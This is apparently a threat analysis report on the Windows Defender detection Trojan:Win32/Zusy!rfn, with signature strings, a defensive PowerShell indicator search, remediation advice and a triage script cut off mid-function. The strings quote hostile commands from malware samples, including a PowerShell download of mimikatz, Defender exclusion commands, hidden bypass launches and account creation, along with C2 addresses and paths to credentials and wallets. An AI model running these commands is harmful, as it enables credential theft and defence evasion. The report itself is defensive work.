user@threatcheck.sh ~ threat-analysis
$ analyze-threat Trojan:Win32/Zusy!rfn
Trojan:Win32/Zusy!rfn - Windows Defender threat signature analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:Win32/Zusy!rfn
Classification:
Type: Trojan (software that masquerades as legitimate while performing malicious actions)
Platform: Win32 (32-bit Windows PE executables)
Family: Zusy (Microsoft family name; the string set below shows it is applied to a broad range of unrelated samples rather than one code base)
Detection Type: Concrete (a named family backed by specific static signatures, not a heuristic-only or machine-learning verdict)
Suffix: !rfn (a Microsoft detection qualifier appended after the family name; Microsoft documents it only as an internal category, and it is not a family, variant or ransomware indicator)
Confidence: Very High that a matched file is malicious or unwanted; low that any two detections share code, operator or infrastructure
False-Positive Risk: Low for the signature as a whole. Several listed strings (".exe", ".text", "GET /", "System.IO") are far too generic to mean anything alone; they only count as weighted components of the PEHSTR_EXT rule

Concrete signature match: a named trojan family (Zusy) on the Win32 platform, detected from static string content of the PE file.

Summary:

Trojan:Win32/Zusy!rfn is a family-level static detection, not a single malware strain. The PEHSTR_EXT strings below come from many unrelated samples: game-cheat loaders, injectors and "spoofers" (Valorant externals, a Roblox exploit front-end, an Easy Anti-Cheat bypass driver, injdrv device names), information stealers that target browser credentials (Chrome's Login Data and Local State), mail profiles (Outlook, Thunderbird) and cryptocurrency wallets (Exodus, Ethereum keystore, Monero), PowerShell loaders that add Defender exclusions and fetch second stages over plain HTTP, Discord- and Telegram-based staging and exfiltration, Chinese-language game trojans and adware, a hacktivist message, and C2 implant and agent components (c2implant, TuoniAgent.dll). Individual samples show process injection ("Process hollowing complete"), Run-key and Startup-folder persistence, anti-analysis via taskkill against Process Hacker, OllyDbg and IDA, and Defender tampering via Add-MpPreference. The private addresses in the list are not shared C2: 10.0.2.15 is the default VirtualBox NAT guest address and :3000/hook.js is the default BeEF hook URL, and 192.168.3.2 is a LAN address, so both almost certainly come from a developer's test environment. Any command-and-control for a given detection must be established from that sample, not from this aggregate list.

Severity:
Critical (the report's rating for the family as a whole; the actual impact of a given detection depends on which sample matched)
VDM Static Detection:
Strings from the PEHSTR/PEHSTR_EXT rules behind this signature, shown as string (rule type). A PEHSTR_EXT rule matches a weighted combination of strings against a threshold, and the weights are not published, so no single string below constitutes a detection on its own; the "!#HSTR:" entries at the end are references to shared sub-rules rather than literal strings. Relevant strings associated with this threat:
 - ftSK\ (PEHSTR_EXT)
 - Process hollowing complete (PEHSTR_EXT)
 - kqxcstfmcndwzigvhiotcmohs.dll (PEHSTR_EXT)
 - Control_RunDLL (PEHSTR_EXT)
 - Local\RustBacktraceMutex (PEHSTR_EXT)
 - Fsoiasgiosgiosagijsd (PEHSTR_EXT)
 - OIoijsg980segiosghj (PEHSTR_EXT)
 - ENDPOINTDLP.DLL (PEHSTR_EXT)
 - ping 192.168.3.2 -n 7 (PEHSTR_EXT)
 - c.tenor.com (PEHSTR_EXT)
 - troll-trollface.gif -o (PEHSTR_EXT)
 - 10.0.2.15:3000/hook.js (PEHSTR_EXT)
 - DnsHostnameToComputerNameW (PEHSTR_EXT)
 - FGBHNJMK.DLL (PEHSTR_EXT)
 - hiosjh98w4goiw4jserjh (PEHSTR_EXT)
 - fork5.dll (PEHSTR_EXT)
 - shibosjeg984gioserhjser (PEHSTR_EXT)
 - OjsjsofjAsjhgsrijhr (PEHSTR_EXT)
 - ASDFGH.DLL (PEHSTR_EXT)
 - MONIBUYVTY.DLL (PEHSTR_EXT)
 - TRCYTVUBI.DLL (PEHSTR_EXT)
 - DRCTF.DLL (PEHSTR_EXT)
 - fork8.dll (PEHSTR_EXT)
 - http://server.0569.microsoftmiddlename.tk (PEHSTR_EXT)
 - http://imgcache.cloudservicesdevc.tk (PEHSTR_EXT)
 - ProgramData/setting.ini (PEHSTR_EXT)
 - HipsTray.exe (PEHSTR_EXT)
 - vtrbytnuyki.dll (PEHSTR_EXT)
 - poofer_update.pdb (PEHSTR_EXT)
 - fork2.dll (PEHSTR_EXT)
 - Pasdogjseohejh (PEHSTR_EXT)
 - LshdgsikdjgoiQjsfohjf (PEHSTR_EXT)
 - .dll (PEHSTR_EXT)
 - c:\\Destro (PEHSTR_EXT)
 - INJECT_ENJOYERS.pdb (PEHSTR_EXT)
 - shample.ru (PEHSTR_EXT)
 - Shample.pdb (PEHSTR_EXT)
 - C:\TEMP\system.exe (PEHSTR_EXT)
 - C:\TEMP\SHAMple.dat (PEHSTR_EXT)
 - Software\SHAMple (PEHSTR_EXT)
 - Windows\CurrentVersion\Run (PEHSTR_EXT)
 - avtest\projects\RedTeam\c2implant\implant (PEHSTR_EXT)
 - yarttdn.de (PEHSTR_EXT)
 - C:\ProgramData\tnalpmi.exe (PEHSTR_EXT)
 - Exodus\exodus.wallet (PEHSTR_EXT)
 - Ethereum\keystore (PEHSTR_EXT)
 - Moonchild Productions\Pale Moon (PEHSTR_EXT)
 - Outlook\9375CFF0413111d3B88A00104B2A6676 (PEHSTR_EXT)
 - DLLExportViewer (PEHSTR_EXT)
 - Downloads\uhloader_[unknowncheats.me]_.dll (PEHSTR_EXT)
 - \Xor_Plus\Splash\Xor-hack.bmp (PEHSTR_EXT)
 - Data/Local/z.jpeg (PEHSTR_EXT)
 - /BanHwID/BanHwID.txt (PEHSTR_EXT)
 - GETSERVER2.0 (PEHSTR_EXT)
 - HsrjisrjAjsrihjr (PEHSTR_EXT)
 - OsjigjsrAjiejgiesj (PEHSTR_EXT)
 - BsohjirjAufiseighjseih (PEHSTR_EXT)
 - MshirAijseihjerh (PEHSTR_EXT)
 - OsojgeiherAijseijeh (PEHSTR_EXT)
 - KsoigjsAjshjrijh (PEHSTR_EXT)
 - Aogioswioghswoihjsrjh (PEHSTR_EXT)
 - KoiosdfhgiiIijshgisrjh (PEHSTR_EXT)
 - hjsgisegjoighjseihe (PEHSTR_EXT)
 - BsjiogsjgioAJIjsrgh (PEHSTR_EXT)
 - Kjsjoighsjrhgisrj (PEHSTR_EXT)
 - Jseiopsgopegiosjiohh (PEHSTR_EXT)
 - Bosdgiosigjsewihjseh (PEHSTR_EXT)
 - Vrheroigjw4oiughjser (PEHSTR_EXT)
 - cdn.discordapp.com/attachments/947450701154517052 (PEHSTR_EXT)
 - \yuki-module.dll (PEHSTR_EXT)
 - \dont_load.txt (PEHSTR_EXT)
 - \inject_version.txt (PEHSTR_EXT)
 - \lightcord-temp\extract.exe (PEHSTR_EXT)
 - .ropf (PEHSTR_EXT)
 - Project.Rummage.exe (PEHSTR_EXT)
 - @.ropf (PEHSTR_EXT)
 - \PostInstall\release\PostInstall.pdb (PEHSTR_EXT)
 - MRCorporation.exe (PEHSTR_EXT)
 - MRCorporation.Properties (PEHSTR_EXT)
 - MRCorporation.Properties.Resources.resources (PEHSTR_EXT)
 - MemberDefRidsAllocated.resources (PEHSTR_EXT)
 - tuiyumtynr.dll (PEHSTR_EXT)
 - odkrhnfld.dll (PEHSTR_EXT)
 - rgthryjt.dll (PEHSTR_EXT)
 - .themida (PEHSTR_EXT)
 - SteamService.exe (PEHSTR_EXT)
 - @.i815 (PEHSTR_EXT)
 - dmcommander.exe (PEHSTR_EXT)
 - naqspvwo.dll (PEHSTR_EXT)
 - datuorlp.dll (PEHSTR_EXT)
 - ComputeHash (PEHSTR_EXT)
 - CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL (PEHSTR_EXT)
 - \AutoRun.exe (PEHSTR_EXT)
 - E:\Projects\multiloader\bin\Release\inj.pdb (PEHSTR_EXT)
 - Setup=pdf.pdf (PEHSTR_EXT)
 - Setup=pdf.exe (PEHSTR_EXT)
 -          .exe (PEHSTR_EXT)
 - .exe (PEHSTR_EXT)
 -                                                                    .exe (PEHSTR_EXT)
 - DPApp.com (PEHSTR_EXT)
 - C:\Users\Public\dwwmm.txt (PEHSTR_EXT)
 - /m1.txt (PEHSTR_EXT)
 - lW)/%;. (PEHSTR)
 - kljszdfyrweon34v9345,oireu (PEHSTR_EXT)
 - wsdlq.com/wg/wlbb.txt (PEHSTR_EXT)
 - Software\xcy\ml (PEHSTR_EXT)
 - xieyilei2001.ys168.com (PEHSTR_EXT)
 - 51mole.com (PEHSTR_EXT)
 - mole.61.com (PEHSTR_EXT)
 - wg148.com/newgo.html0 (PEHSTR_EXT)
 - zy.anjian.com/soft/xjl/xjl.php (PEHSTR_EXT)
 - xunxunjp.com/1018jp.txt (PEHSTR_EXT)
 - taskkill /f /t /im iphoneqq.exe (PEHSTR_EXT)
 - iwofeng.com/tc.txt (PEHSTR_EXT)
 - cmd.exe /c net user hello123 hellxxx_Hxxx (PEHSTR_EXT)
 - JS% (SNID)
 - 112.175.69.77 pk555.com 777wt.com www.777wt.com 79.sf923.com sf777.com www.sf99.cc sf99.cc www.meishipai.com jdmzd.com (PEHSTR_EXT)
 - 67.198.179.75 www.22cq.com www.3000okhaosf.com hao119.haole56.com www.sf63.com 456ok.45195.com 79.sf923.com www.53uc.com 53uc.com www.recairen.com (PEHSTR_EXT)
 - Program Files\xcdlq (PEHSTR_EXT)
 - Windows\diskpt.dat (PEHSTR_EXT)
 - Yrnjfb^YZwsokgc_Y[xtplhd`Y\ (PEHSTR_EXT)
 - wallet.tenpay.com/cgi-bin/v1.0/queryqb.cgi (PEHSTR_EXT)
 - http://%s:%d/%s/%s (PEHSTR_EXT)
 - %s%.8x.bat (PEHSTR_EXT)
 - SOFTWARE\GTplus (PEHSTR_EXT)
 - %s M %s -r -o+ -ep1 "%s" "%s\*" (PEHSTR_EXT)
 - ShellExecuteA (PEHSTR_EXT)
 - voipcall.taobao (PEHSTR_EXT)
 - qsyou.com (PEHSTR_EXT)
 - Svdrd.exe (PEHSTR_EXT)
 - Svdrd.Resources.resources (PEHSTR_EXT)
 - 43.136.234.140:7890/Cloud150/SSDTHook_IO_Link.txt (PEHSTR_EXT)
 - AQAQAQ.txt (PEHSTR_EXT)
 - ktkt.txt (PEHSTR_EXT)
 - CMD /C SC DELETE (PEHSTR_EXT)
 - windows\cache\mgr.vbs (PEHSTR_EXT)
 - ftp.forest-fire.net (PEHSTR_EXT)
 - workspace\ (PEHSTR_EXT)
 - 0\bin\Release\ADBlockMasterTray.pdb (PEHSTR_EXT)
 - 12N\{ (SNID)
 - MelonSpoofer_b2.Properties.Resources (PEHSTR_EXT)
 - Mkwimscxva.Properties.Resources (PEHSTR_EXT)
 - WindowsFormsApp47.Properties.Resources.resources (PEHSTR_EXT)
 - Phadgood.MdivideWxflysx (PEHSTR_EXT)
 - togetherfowlappear5yearsthe3saying.o6 (PEHSTR_EXT)
 - heavenmeatbeholdyou.rejseed (PEHSTR_EXT)
 - bcalledthey.retmayflyIY0r (PEHSTR_EXT)
 - Discord DM : _encrypt3d. (PEHSTR_EXT)
 - \StarHighSrcFixV3\Blue loader\Blue loader (PEHSTR_EXT)
 - I Follow You.dll (PEHSTR_EXT)
 - WinExec (PEHSTR_EXT)
 - WinHttpReceiveResponse (PEHSTR_EXT)
 - D:\Desktop\TheDLL\x64\Release\TheDLL.pdb (PEHSTR_EXT)
 - EasyAntiCheat.sys (PEHSTR_EXT)
 - EacExploit.pdb (PEHSTR_EXT)
 - \Device\injdrv (PEHSTR_EXT)
 - \DosDevices\injdrv (PEHSTR_EXT)
 - \Driver\injdrv (PEHSTR_EXT)
 - Failed to open file for writing. (PEHSTR_EXT)
 - stormss.xyz/api (PEHSTR_EXT)
 - Hus Loader.pdb (PEHSTR_EXT)
 - dsc.gg/rive (PEHSTR_EXT)
 - start cmd /C (PEHSTR_EXT)
 - HiveNightmare.pdb (PEHSTR_EXT)
 - //vegax.gg/windows/ui_ver.php (PEHSTR_EXT)
 - VegaX\VegaX\obj\Release\Vega X.pdb (PEHSTR_EXT)
 - HKEY_CURRENT_USER\Software\VegaX (PEHSTR_EXT)
 - /Vega X;component/spawnablewindows/injectcode.xaml (PEHSTR_EXT)
 - autoexec\vegaxfpsunlocker.txt (PEHSTR_EXT)
 - DllCanUnloadNow (PEHSTR_EXT)
 - DllEntry (PEHSTR_EXT)
 - taskkill /f /im ProcessHacker.exe (PEHSTR_EXT)
 - taskkill /f /im FiddlerEverywhere.exe (PEHSTR_EXT)
 - taskkill /f /im OllyDbg.exe (PEHSTR_EXT)
 - taskkill /f /im Ida64.exe (PEHSTR_EXT)
 - \\.\kprocesshacker (PEHSTR_EXT)
 - cdn.discordapp.com/attachments (PEHSTR_EXT)
 - 79.174.92.22 (PEHSTR_EXT)
 - WVY3KZnpiFVzltHbFlr5U2Z30T2llQB1ZKkUGcJVQFxtNW2NL1R3ppZZhpWDSlJhDFF1cFaVxjWVkd3JaWYH7Xw== (PEHSTR_EXT)
 - VWhB9a0JQyMHY1DeWJT6eTR1NcBMueBy0EEFnYwLGD8koFT8ZAMzYTXLmwtkBBZ2EW3M/7JBU/GcjM2rEy4HZLQ== (PEHSTR_EXT)
 - NOSKILL RAFA.pdb (PEHSTR_EXT)
 - powershell.exe-Command (PEHSTR_EXT)
 - Clear-RecycleBin -Force -ErrorAction SilentlyContinueC:\Users\Public (PEHSTR_EXT)
 - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartupUSERPROFILEFailed to get USERPROFILE (PEHSTR_EXT)
 - \AppData\Local\Google\Chrome\User Data\Default\Login Data (PEHSTR_EXT)
 - \AppData\Local\Google\Chrome\User Data\Local State (PEHSTR_EXT)
 - \AppData\Roaming\Microsoft\protects.zip (PEHSTR_EXT)
 - \AutoTorIP\obj\Debug\SecurSocks.pdb (PEHSTR_EXT)
 - powershell -NoProfile -ExecutionPolicy bypass -windowstyle hidden -Command (PEHSTR_EXT)
 - -NoProfile -windowstyle hidden -ExecutionPolicy bypass -Command  (PEHSTR_EXT)
 - NeekroAgain\Desktop\esp + aim meu ultimo\esp final testar coisas - Copia - Copia - Copia - Copia\Valorant-External-main\x64\Release (PEHSTR_EXT)
 - rasfdtyasdas.pdb (PEHSTR_EXT)
 - sdfgdfgfd.pdb (PEHSTR_EXT)
 - iasuidosdf.pdb (PEHSTR_EXT)
 - im MESTEResp final testar coisas - Copia - Copia - Copia - CopiaValorant - External - mainValorantOptimusPrinceps.ttf (PEHSTR_EXT)
 - retliften\secivreS\teSlortnoCtnerruC\METSYSs (PEHSTR_EXT)
 - stopify.co/news.php?tid=JBB69H.jpg (PEHSTR_EXT)
 - \AppData\Local\Temp\bin.exe (PEHSTR_EXT)
 - /tsoHbrKdetcirtseR (PEHSTR_EXT)
 - Pillager.dll (PEHSTR_EXT)
 - TripleDESCryptoServiceProvider (PEHSTR_EXT)
 - EncryptedLog.txt (PEHSTR_EXT)
 - KeyAndIV.txt (PEHSTR_EXT)
 - Seven.dll (PEHSTR_EXT)
 - v5.mrmpzjjhn3sgtq5w.pro (PEHSTR_EXT)
 - isapi/isapiv5.dll/v5 (PEHSTR_EXT)
 - pipe\vSDsGRFs62ghf (PEHSTR_EXT)
 - pipe\vsVSDDTGHGSy54 (PEHSTR_EXT)
 - CensoIBGE.RemoveCadastro.resources (PEHSTR_EXT)
 - del /s /f /q C:\Windows\Prefetch (PEHSTR_EXT)
 - deactivation.php?hash= (PEHSTR_EXT)
 - activation.php?code= (PEHSTR_EXT)
 - jmweczbxcvjsi (PEHSTR_EXT)
 - http://103.116.105.90/kyuc1/ (PEHSTR)
 - so2game_lite.exe (PEHSTR)
 - Tyrone.dll (PEHSTR_EXT)
 - set_UseShellExecute (PEHSTR_EXT)
 - Koi.Properties (PEHSTR_EXT)
 - settings\shop\type.txt (PEHSTR_EXT)
 - 04 - Downloads.lnk (PEHSTR_EXT)
 - Global\3pc6RWOgectGTFqCowxjeGy3XIGPtLwNrsr2zDctYD4hAU5pj4GW7rm8gHrHyTB6 (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - Execute (PEHSTR_EXT)
 - desktop.ini (PEHSTR_EXT)
 - FinalUncompressedSize (PEHSTR_EXT)
 - RtlGetCompressionWorkSpaceSize (PEHSTR_EXT)
 - System.Net (PEHSTR_EXT)
 - json:"iterator_slice" (PEHSTR_EXT)
 - main.DLLWMain (PEHSTR_EXT)
 - json:"client_id,omitempty (PEHSTR_EXT)
 - `.g.b.g.d.e.`.g.c.;.8. (PEHSTR_EXT)
 - $IM3YYFM.au3 (PEHSTR_EXT)
 - C:\$Recycle. (PEHSTR_EXT)
 - .ps1 (PEHSTR_EXT)
 - ps1 (PEHSTR_EXT)
 - ge.ps1 (PEHSTR_EXT)
 - \'cS@ (SNID)
 - System.Runtime (PEHSTR_EXT)
 - RuntimeCompatibilityAttribute (PEHSTR_EXT)
 - .ctor (PEHSTR_EXT)
 - .Security.Cryptography (PEHSTR_EXT)
 - riotclient://RiotClientServices.exe (PEHSTR_EXT)
 - server1.exe (PEHSTR_EXT)
 - server.Resources.resources (PEHSTR_EXT)
 - StealerDLL\x64\Release\STEALERDLL.pdb (PEHSTR_EXT)
 - Monero\wallets (PEHSTR_EXT)
 - Thunderbird\Profiles (PEHSTR_EXT)
 - \Users\Public\webdata\info.dat (PEHSTR_EXT)
 - WebSvc ... RegisterMachine w_sUUID (PEHSTR_EXT)
 - /C taskkill /IM %s /F (PEHSTR_EXT)
 - \Google\Chrome\Application\chrome.exe" --restore-last-session (PEHSTR_EXT)
 - dash.zintrack.com (PEHSTR_EXT)
 - You can kill a people, but you can't kill an idea. Resistance will continue until the final liberation of all Palestinian lands, and it is only a matter of time. (PEHSTR_EXT)
 - yahhelper.no-ip.org (PEHSTR_EXT)
 - IP=%s ComputerName=%s UserName=%s Attacked=%d/%d/%d (PEHSTR_EXT)
 - TheComputerOfTheGhost (PEHSTR_EXT)
 - System.Security.Cryptography (PEHSTR_EXT)
 - GetExecutingAssembly (PEHSTR_EXT)
 - \Stealler.pdb (PEHSTR_EXT)
 - DllImportAttribute (PEHSTR_EXT)
 - %userappdata%\RestartApp.exe (PEHSTR_EXT)
 - defOff.exe (PEHSTR_EXT)
 - GDI32.dll (PEHSTR_EXT)
 - 32.dll (PEHSTR_EXT)
 - 9.dll (PEHSTR_EXT)
 - System.IO (PEHSTR_EXT)
 - costura.costura.dll.compressed (PEHSTR_EXT)
 - TJprojMain.exe (PEHSTR_EXT)
 - %s:*:enabled:@shell32.dll,-1 (PEHSTR_EXT)
 - BaseOfDll (PEHSTR_EXT)
 - GET /livi.bin (PEHSTR_EXT)
 - \Data\Solutions\ (PEHSTR_EXT)
 - 0.pdb (PEHSTR_EXT)
 - WS2_32.dll (PEHSTR_EXT)
 - /new/net_api (PEHSTR_EXT)
 - powershell -Command  (PEHSTR_EXT)
 - GET / (PEHSTR_EXT)
 - 7N\efkidRdheeMgpx* (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run\W32Time (PEHSTR_EXT)
 - libgcj_s.dll (PEHSTR_EXT)
 - .rsrc (PEHSTR_EXT)
 - Microsoft.VisualBasic.Application (PEHSTR_EXT)
 - System. (PEHSTR_EXT)
 - .text (PEHSTR_EXT)
 - .rdata (PEHSTR_EXT)
 - @.data (PEHSTR_EXT)
 - D.text (PEHSTR_EXT)
 - .idata   (PEHSTR_EXT)
 - .taggant (PEHSTR_EXT)
 - Zn(X\ck+O|jvTG}!mcU@a^ (PEHSTR_EXT)
 - <description>Inno Setup</description> (PEHSTR_EXT)
 - Fsignature.compressed (PEHSTR_EXT)
 - Fakilaharios.Resources (PEHSTR_EXT)
 - ExecutionPolicy Bypass (PEHSTR_EXT)
 - discord.gg (PEHSTR_EXT)
 - ExclusionLoader.pdb (PEHSTR_EXT)
 - pfx.strongname.compressed (PEHSTR_EXT)
 - pfx.stgname.compressed (PEHSTR_EXT)
 - crt.pfx.compressed (PEHSTR_EXT)
 - bbggtth.exe (PEHSTR_EXT)
 - XSPCnxO3J5eKgrbQ3R.7ljbNpdbPT7 (PEHSTR_EXT)
 - my_new_hook_project.dll (PEHSTR_EXT)
 - lognationprimecarraro.com/settings/config2.zip (PEHSTR_EXT)
 - infinitycheats\GameHelpersLoader__NEW\bin\Release\net8.0\win-x64\native\GameHelpersLoader__NEW.pdb (PEHSTR_EXT)
 - cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\WinXRAR\mimikatz.exe (PEHSTR_EXT)
 - cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR (PEHSTR_EXT)
 - lderd\Release\lderd.pdb (PEHSTR_EXT)
 - BobuxManRemastered.exe (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Internet Settings (PEHSTR_EXT)
 - #Add-MpPreference -ExclusionPath C:\ (PEHSTR)
 - &$output = "$env:Temp/RuntimeBroker.exe (PEHSTR)
 - QStart-Process PowerShell -Verb RunAs "-NoProfile -ExecutionPolicy Bypass -Command (PEHSTR)
 - MGetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator (PEHSTR)
 - KTmV3LUl0ZW1Qcm9wZXJ0eSAtUGF0aCAiSEtDVTpcUkNXTVxyYyIgLU5hbWUgIiRhcmdzIg (PEHSTR_EXT)
 - `.rdata (PEHSTR_EXT)
 - URlMON.dLl (PEHSTR_EXT)
 - ,/<-w (PEHSTR_EXT)
 - X.text (PEHSTR_EXT)
 - .gfcd (PEHSTR_EXT)
 - cmd.exe /C timeout /T 1 /NOBREAK >nul (PEHSTR_EXT)
 - TuoniAgent.dll (PEHSTR_EXT)
 - BK: Succesfully deleted registry key: HKEY_LOCAL_MACHINE\%s - "%s (PEHSTR_EXT)
 - taskmgr.exe (PEHSTR_EXT)
 - msconfig.exe (PEHSTR_EXT)
 - shutdown.exe (PEHSTR_EXT)
 - taskkill.exe (PEHSTR_EXT)
 - payload.exe (PEHSTR_EXT)
 - a-zA-Z0-9+/ (PEHSTR_EXT)
 - AlarmPlus.Properties.Resources.resources (PEHSTR_EXT)
 - +iJuBfovHhKMKXZfVv7Tv8WYJ62/Nvgh3jDNr3UCSUZFE5lLlmSt4pL5+ZbUjcZ6TfUgnUQP92yh9qYAwk/LQQ== (PEHSTR_EXT)
 - Unlocker.exe (PEHSTR_EXT)
 - DownloaderApp.exe (PEHSTR_EXT)
 - iDTHNqCQGIVt0KFQUh9NyrHXKGQ7j/aa (PEHSTR_EXT)
 - api.telegram.org/bot (PEHSTR_EXT)
 - main.obfuscateCommand (PEHSTR_EXT)
 - iDTHNqCQGIVt0KFQUh9NyrHXKGQ7j/aaE/SNKAszEoyZwX6Vb7GJggL5/KBLM14rSMqsGxRA+ucLjSsANNLFeQ== (PEHSTR_EXT)
 - E:\VS2010\VC\include\ (PEHSTR_EXT)
 - -> CD/DVD (PEHSTR_EXT)
 - http://195.66.27.77:5554/ (PEHSTR_EXT)
 -  _bound_build.exe (PEHSTR_EXT)
 - http://91.108.241.80:5554/ (PEHSTR_EXT)
 - tjgajdjrg.exe (PEHSTR_EXT)
 - http (PEHSTR_EXT)
 -  .exe (PEHSTR_EXT)
 - 195.66.27.77 (PEHSTR_EXT)
 - 84.21.189.158 (PEHSTR_EXT)
 - nbgtpasrg.exe (PEHSTR_EXT)
 - crypted_build.exe (PEHSTR_EXT)
 - kan\Desktop\den444\den444\obj\Debug\den444.pdb (PEHSTR_EXT)
 - /auto.AutoModeChromeGather (PEHSTR_EXT)
 - %s.tar.gz (PEHSTR_EXT)
 - bits-project/bits/util (PEHSTR_EXT)
 - gather.tH (PEHSTR_EXT)
 - r.tar.gzH (PEHSTR_EXT)
 - Release\sessionuserhost (PEHSTR_EXT)
 - http://176.46.152.62:5858/ (PEHSTR_EXT)
 - *_build.exe (PEHSTR_EXT)
 - http://176.46.152.62:5858/dadaasads_new.ps1 (PEHSTR_EXT)
 - powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File (PEHSTR_EXT)
 - den444.exe (PEHSTR_EXT)
 - .?AV_ (PEHSTR_EXT)
 - Obak.dll ofyh (PEHSTR_EXT)
 - Exercicio05.Properties.Resources (PEHSTR_EXT)
 - wctEE5D.tmp (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
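The list above is most useful as a triage aid for a suspect file. The following PowerShell is an added example, not part of the threatcheck.sh report or of any Microsoft tooling: it searches a byte blob for a constructed subset of the strings above in both ASCII and UTF-16LE form (.NET and many Win32 binaries store string literals as UTF-16LE). Because the rule's weights and threshold are not published, a hit list tells you which indicators are present, not whether Defender would fire; the $indicators subset and the $sample blob are constructed for this example.

```powershell
# Added example (not from the report): look for a subset of the PEHSTR_EXT strings
# in a byte array, in both ASCII and UTF-16LE encodings. Weights/threshold of the real
# rule are unknown, so this is an indicator search, not a re-implementation of the signature.

$indicators = @(
    'Process hollowing complete'
    'Local\RustBacktraceMutex'
    'Add-MpPreference -ExclusionPath'
    'Software\Microsoft\Windows\CurrentVersion\Run'
    '\AppData\Local\Google\Chrome\User Data\Default\Login Data'
    'Exodus\exodus.wallet'
    'api.telegram.org/bot'
    'INJECT_ENJOYERS.pdb'
)

function Find-IndicatorStrings {
    param(
        [Parameter(Mandatory)] [byte[]]   $Bytes,
        [Parameter(Mandatory)] [string[]] $Strings
    )
    # Code page 28591 (Latin-1) maps every byte to exactly one char, so searching this
    # string is a byte-for-byte search that never fails on invalid sequences.
    $haystack = [System.Text.Encoding]::GetEncoding(28591).GetString($Bytes)

    foreach ($s in $Strings) {
        # UTF-16LE form of an ASCII-range string: each char followed by a NUL byte.
        $wide = -join ($s.ToCharArray() | ForEach-Object { "$_`0" })

        # Ordinal comparison matters: culture-aware IndexOf can ignore embedded NULs,
        # which would produce false hits for the wide form and for NUL-split decoys.
        $a = $haystack.IndexOf($s,    [System.StringComparison]::Ordinal)
        $w = $haystack.IndexOf($wide, [System.StringComparison]::Ordinal)

        if ($a -ge 0) { [pscustomobject]@{ String = $s; Encoding = 'ASCII';    Offset = $a } }
        if ($w -ge 0) { [pscustomobject]@{ String = $s; Encoding = 'UTF-16LE'; Offset = $w } }
    }
}

# Constructed sample: MZ header, filler, one ASCII indicator, one UTF-16LE indicator,
# and a decoy in which the indicator text is interrupted by a NUL (must not match).
$ascii   = [System.Text.Encoding]::ASCII
$unicode = [System.Text.Encoding]::Unicode   # .NET name for UTF-16LE
$sample  = [byte[]](
    $ascii.GetBytes('MZ') + (New-Object byte[] 64) +
    $ascii.GetBytes('[*] Process hollowing complete') +
    $unicode.GetBytes('Software\Microsoft\Windows\CurrentVersion\Run') +
    $ascii.GetBytes("api.telegram`0.org/bot")
)

Find-IndicatorStrings -Bytes $sample -Strings $indicators | Format-Table -AutoSize

# Against a real file (path is a placeholder):
# Find-IndicatorStrings -Bytes ([IO.File]::ReadAllBytes('C:\samples\Spoofer.exe')) -Strings $indicators
```

Extend $indicators with the rest of the list as needed, but keep the very short entries (".exe", ".text", "http") out of any scoring you build on top of this: they match nearly every PE file and are only meaningful inside Defender's own weighting.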
Known malware associated with this threat:
Filename: Spoofer.exe
SHA-256: b4b6de07a167b66c62606d30180ebaeef6df3392d2c28c2144dccae20a85915f
Date: 24/12/2025
Remediation Steps:
Isolate the host from the network and preserve it for triage before cleaning it: record the detected file (path, hash, parent process) from the Defender detection history, and collect Run keys, Startup-folder contents, scheduled tasks and Defender exclusions, since the string set shows all of these being used for persistence or to blind the scanner. Run a full scan with current definitions and remove what it finds. Treat credentials stored on the host as compromised: the strings target Chrome's Login Data and Local State, Outlook and Thunderbird profiles and Exodus, Ethereum and Monero wallets, so reset browser-saved and mail passwords and migrate any funds whose wallet key material lived on the machine. Block or monitor the attacker-controlled hosts in the list (for example the .tk and .xyz domains and the bare IP addresses with :5554 and :5858 listeners), but weigh the disruption before blanket-blocking cdn.discordapp.com, api.telegram.org or c.tenor.com, which are legitimate services abused for hosting and exfiltration; the private addresses 192.168.3.2 and 10.0.2.15 are not perimeter indicators at all. Because this is a family-level detection, confirm any C2 from the specific sample rather than from this aggregate list.
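A first-pass host triage that covers the points above, as an added example not taken from the report or from Microsoft: it uses only the built-in Defender cmdlets, the registry and the Defender operational event log. Run it in an elevated PowerShell session. The seven-day look-back window and the LOLBin regex are choices made for this example.

```powershell
# Added example (not from the report): triage a Windows host after a
# Trojan:Win32/Zusy!rfn detection. Run elevated.

$threatName = 'Trojan:Win32/Zusy!rfn'
$since      = (Get-Date).AddDays(-7)   # look-back window chosen for this example

function Get-ZusyDetections {
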